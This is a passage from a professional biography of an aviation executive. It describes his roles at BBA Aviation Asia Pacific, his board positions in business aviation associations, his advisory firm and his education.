During this time he both opened and acquired businesses in the UK, France, Germany, Greece, Ireland and South Africa. In 2012 David assumed the position of President BBA Aviation Asia Pacific in Singapore. In this role he headed up the strategic development of the FBO, commercial groundhandling, engine repair, and component repair businesses in the Region. During his time in Asia he worked extensively in Thailand, Singapore and Hong Kong and also evaluated businesses in Australia, Philippines and Brunei. He was also Board member of Hong Kong Business Aviation Centre for 10 years through its growth and development.
Since 2015 David has acted as Principal at Claymore Hill Advisory, working on business and aviation projects globally. He enjoys a Board advisory position with TrainingPort.net, a market leading business aviation training provider, serves as Vice Chairman of the Asian Business Aviation Association and sits on the Governing Board of the International Business Aviation Council. A graduate of the University of Strathclyde earning BA (Hons) and an MBA, David is now based out of the USA but spends significant time in both Europe and Asia.
